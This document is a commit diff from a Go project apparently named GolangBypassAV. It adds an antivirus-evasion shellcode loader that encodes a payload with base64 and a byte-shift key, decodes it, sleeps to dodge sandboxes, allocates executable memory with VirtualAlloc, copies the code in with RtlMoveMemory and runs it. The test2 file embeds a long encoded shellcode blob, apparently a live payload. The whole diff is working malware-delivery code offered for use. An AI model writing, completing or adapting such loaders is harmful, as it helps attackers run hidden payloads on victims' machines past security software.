update

main.go

@@ -1,27 +1,16 @@
 package main
 
 import (
-	"encoding/hex"
-	"fmt"
+	"GolangBypassAV/shellcode"
 	"io/ioutil"
 	"os"
 )
 
 func main() {
 
 	if len(os.Args) != 2 {
-		fmt.Printf("Must have shellcode of file\n")
 		os.Exit(1)
 	}
-
-	sc, err := ioutil.ReadFile(os.Args[1])
-	if os.IsNotExist(err) {
-		sc, err = hex.DecodeString(os.Args[1])
-		if err != nil {
-			fmt.Printf("Error decoding arg 1: %s\n", err)
-			os.Exit(1)
-		}
-	}
-	fmt.Println(sc)
-	//shellcode.Run(sc)
+	sc, _ := ioutil.ReadFile(os.Args[1])
+	shellcode.Run(sc)
 }

shellcode/bp.go

@@ -0,0 +1 @@
+package shellcode

shellcode/main.go

@@ -0,0 +1,125 @@
+package shellcode
+
+import (
+	"GolangBypassAV/encry"
+	"encoding/base64"
+	"fmt"
+	"os"
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+)
+
+var kk = []byte{0x12}
+
+func base64Decode(data string) []byte {
+	data1, _ := base64.StdEncoding.DecodeString(data)
+	return data1
+}
+
+func base64Encode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+	return bdata
+}
+
+func getEnCode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+
+	bydata := []byte(bdata)
+	var shellcode []byte
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]+kk[0])
+	}
+	return base64.StdEncoding.EncodeToString(shellcode)
+}
+
+var (
+	kernel32      = syscall.MustLoadDLL("kernel32.dll")
+	ntdll         = syscall.MustLoadDLL("ntdll.dll")
+	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
+	RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
+)
+
+func getDeCode(string2 string) []byte {
+
+	ss, _ := base64.StdEncoding.DecodeString(string2)
+	string2 = string(ss)
+	var shellcode []byte
+
+	bydata := []byte(string2)
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]-kk[0])
+	}
+	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
+	return ssb
+
+}
+
+func checkError(err error) {
+	if err != nil {
+		if err.Error() != "The operation completed successfully." {
+			println(err.Error())
+			os.Exit(1)
+		}
+	}
+}
+
+func genEXE(charcode []byte) {
+
+	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	if addr == 0 {
+		checkError(err)
+	}
+	gd()
+
+	_, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
+	checkError(err)
+
+	gd()
+	for j := 0; j < len(charcode); j++ {
+		charcode[j] = 0
+	}
+	syscall.Syscall(addr, 0, 0, 0, 0)
+}
+
+func gd() int64 {
+	time.Sleep(time.Duration(2) * time.Second)
+
+	dd := time.Now().UTC().UnixNano()
+	return dd + 123456
+
+}
+
+func getFileShellCode(file string) []byte {
+	data := encry.ReadFile(file)
+	//shellCodeHex := encry.GetBase64Data(data)
+	//fmt.Print(shellCodeHex)
+	return data
+}
+
+func getFileShellCode1(file string) string {
+	data := encry.ReadFile(file)
+	shellCodeHex := base64Encode(data)
+	fmt.Print(shellCodeHex)
+	return shellCodeHex
+}
+
+func Run(string2 []byte) {
+	//fmt.Println(1)
+
+	//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))
+
+	dd := getEnCode(string2)
+
+	shellCodeHex := getDeCode(dd)
+	gd()
+	genEXE(shellCodeHex)
+}

test1/main.go

@@ -16,7 +16,7 @@ const (
 	PAGE_EXECUTE_READWRITE = 0x40
 )
 
-var kk = []byte{0x11}
+var kk = []byte{0x21}
 
 func base64Decode(data string) []byte {
 	data1, _ := base64.StdEncoding.DecodeString(data)

test2/main.go

@@ -16,7 +16,7 @@ const (
 	PAGE_EXECUTE_READWRITE = 0x40
 )
 
-var kk = []byte{0x11}
+var kk = []byte{0x13, 0x32}
 
 func base64Decode(data string) []byte {
 	data1, _ := base64.StdEncoding.DecodeString(data)
@@ -35,7 +35,7 @@ func getEnCode(data []byte) string {
 	var shellcode []byte
 
 	for i := 0; i < len(bydata); i++ {
-		shellcode = append(shellcode, bydata[i]+kk[0])
+		shellcode = append(shellcode, bydata[i]+kk[0]-kk[1])
 	}
 	return base64.StdEncoding.EncodeToString(shellcode)
 }
@@ -56,7 +56,7 @@ func getDeCode(string2 string) []byte {
 	bydata := []byte(string2)
 
 	for i := 0; i < len(bydata); i++ {
-		shellcode = append(shellcode, bydata[i]-kk[0])
+		shellcode = append(shellcode, bydata[i]-kk[0]+kk[1])
 	}
 	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
 	return ssb
@@ -113,7 +113,7 @@ func main() {
 
 	//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))
 
-	bbdata := "QFZ6VUZhVYCKUlJSUlZXY2JnU2RmZ2taXnVbfWRahWRqVnpdZnl5WnpCWnhkWoWKZlZ4YYVBgVxlZVlbZFVZUoNViXl3UlqEWlZZU4piQlNSdFl6SGdbU2Zmel1melRdYnuJWlJ1U354aXhqVIhbQnSAhlJ6UlJSUlZ6V4hZY39kUlliZlqFWlhWZF1iVFNbUnVVe2d8e0CKZlhdX1p5WlJ1a19edH1aXnRUhGJ0WVtVZlZTiGV7eHV3V15SQYh8VFZmRkFpaWpoVmRdYlRjW1J1U35iaoReZFZkXWJTiVtSdVNTeohkWmRSWWJiZ3lTaFdGa2h8V2piZ31TaHx6VUhUU1Nmh0B4aFZXa2h8el1Whn1hQEBAQGlogFJkc0ZEcmhGgXN+Z0FSVldoZGp/fmVaf4lic4FedYpqWUBKZ1pedH1aXnVbX150U19edH1TZlZXYmJzgEdnf35/QEppg3RCgVp6dFdThlRSVVJSU19edH1TZmZXY3J4X1NmZlhHZ0V+d4mHQGdHQn1zZFp/U2RVWWRkan9qZWVZW2Z+eFJSfFRWZn1bU4aGhWdde4dAQmZ6W4l8elWIQlOCVH1KWnp3V1p6dYFbiUlVQEBAQEBlZVlbZn1bU4Z6QVhYWYdAQmppUlVFaHVSYlJSZGFAYVVFZF5SYlJSR0phgUZSVlJSYHp6QEBAQF1EfUdfi15SfGtoZ3VVdWZScnpKgHJlW1eBRlOFhkaAalZfhmJzc0J5gF14a4p+QHmDemZFd0d8X0mFfWmIi31HcoJYf3mIamSIYIODX15GQGKGYXN4Z1dkf4tHSIZiRIl6ZWpJhINbdlJTZ3RDZ4pdZld/a2hGQWB6U19zRIGBc1iJeV2LZoZeVFKAakNKhXRYV0FyaFuEa2WEeGVnX1tjZFJGXXtSSFpZV3xraV+DWlVahl9URYlee2qLXXtaiF6LhHhnQ32Ga1hKRHSKU2BnVFJDXXtWSFpXdWFni2pBYIpTZnR+fXxraEZBXYtmhl5UfF9UeFJpaX9Dh0JIc2dUSF92il9ci19nQ4lFa0p+g3t6f0iKiWRkfmlnQ35ad3J6UouFglNog3VaXHRagEpaYEpBf4hpfXuLYXR7RXpKZlVqZmJTa2JKSEBZaEB+WXuJholGaEZkRohUZIFCRFViSGWIY354c1aIRVNSiFlIRWN5YXiHfHJDRYE8doRgflxXRX5KSnVnSUqFW3pZeHqEVmlaWkNBRH6Gi4ZeY4hWaH2Ee1hdYWB6X0VBfmBbd1l7Q3xkh1pHWkFKaIBHYmZ3RFV2dEZnWGGJe1lIfkOHc1Z0Z0dzQXeAg4BJVFyKdWSJWkhocoVIWn1lWGeJgXp2gUaDW35nX1mDRXVFi1pSYnNIiIVyW2hASmdaXnR+R1JSU1JSVlhFUlNSUlJWWEZiUlJSUlZYR2hcY2VGd0BnZFtfZWZBeltGQXpbSWZ6W0N8WEVSVFJSUlZ+WzxmWEdWgXJbRYdAZ2RaYVZaWmlSdV1rfnqIdVpSdGBXiFlpaWhXeWpkUmZSUlJSUmZeYYB/QERAQItWil56RUZde1ZCX4pFiV57WlJWe2NodlJOTg=="
+	bbdata := "ECZKJRYxJVBaIiIiIiYnMzI3IzQ2NzsqLkUrTTQqVTQ6JkotNklJKkoSKkg0KlVaNiZIMVURUSw1NSkrNCUpIlMlWUlHIipUKiYpI1oyEiMiRClKGDcrIzY2Si02SiQtMktZKiJFI05IOUg6JFgrEkRQViJKIiIiIiZKJ1gpM080IikyNipVKigmNC0yJCMrIkUlSzdMSxBaNigtLypJKiJFOy8uRE0qLkQkVDJEKSslNiYjWDVLSEVHJy4iEVhMJCY2FhE5OTo4JjQtMiQzKyJFI04yOlQuNCY0LTIjWSsiRSMjSlg0KjQiKTIyN0kjOCcWOzhMJzoyN00jOExKJRgkIyM2VxBIOCYnOzhMSi0mVk0xEBAQEDk4UCI0QxYUQjgWUUNONxEiJic4NDpPTjUqT1kyQ1EuRVo6KRAaNyouRE0qLkUrLy5EIy8uRE0jNiYnMjJDUBc3T05PEBo5U0QSUSpKRCcjViQiJSIiIy8uRE0jNjYnM0JILyM2NigXNxVOR1lXEDcXEk1DNCpPIzQlKTQ0Ok86NTUpKzZOSCIiTCQmNk0rI1ZWVTctS1cQEjZKK1lMSiVYEiNSJE0aKkpHJypKRVErWRklEBAQEBA1NSkrNk0rI1ZKESgoKVcQEjo5IiUVOEUiMiIiNDEQMSUVNC4iMiIiFxoxURYiJiIiMEpKEBAQEC0UTRcvWy4iTDs4N0UlRTYiQkoaUEI1KydRFiNVVhZQOiYvVjJDQxJJUC1IO1pOEElTSjYVRxdMLxlVTTlYW00XQlIoT0lYOjRYMFNTLy4WEDJWMUNINyc0T1sXGFYyFFlKNToZVFMrRiIjN0QTN1otNidPOzgWETBKIy9DFFFRQyhZSS1bNlYuJCJQOhMaVUQoJxFCOCtUOzVUSDU3LyszNCIWLUsiGCopJ0w7OS9TKiUqVi8kFVkuSzpbLUsqWC5bVEg3E01WOygaFERaIzA3JCITLUsmGConRTE3WzoRMFojNkROTUw7OBYRLVs2Vi4kTC8kSCI5OU8TVxIYQzckGC9GWi8sWy83E1kVOxpOU0tKTxhaWTQ0Tjk3E04qR0JKIltVUiM4U0UqLEQqUBoqMBoRT1g5TUtbMURLFUoaNiU6NjIjOzIaGBApOBBOKUtZVlkWOBY0FlgkNFESFCUyGDVYM05IQyZYFSMiWCkYFTNJMUhXTEITFVEMRlQwTiwnFU4aGkU3GRpVK0opSEpUJjkqKhMRFE5WW1YuM1gmOE1USygtMTBKLxURTjArRylLE0w0VyoXKhEaOFAXMjZHFCVGRBY3KDFZSykYThNXQyZENxdDEUdQU1AZJCxaRTRZKhg4QlUYKk01KDdZUUpGURZTK043LylTFUUVWyoiMkMYWFVCKzgQGjcqLkROFyIiIyIiJigVIiMiIiImKBYyIiIiIiYoFzgsMzUWRxA3NCsvNTYRSisWEUorGTZKKxNMKBUiJCIiIiZOKww2KBcmUUIrFVcQNzQqMSYqKjkiRS07TkpYRSoiRDAnWCk5OTgnSTo0IjYiIiIiIjYuMVBPEBQQEFsmWi5KFRYtSyYSL1oVWS5LKiImSzM4RiIeHg=="
 	shellCodeHex := getDeCode(bbdata)
 	gd()
 	genEXE(shellCodeHex)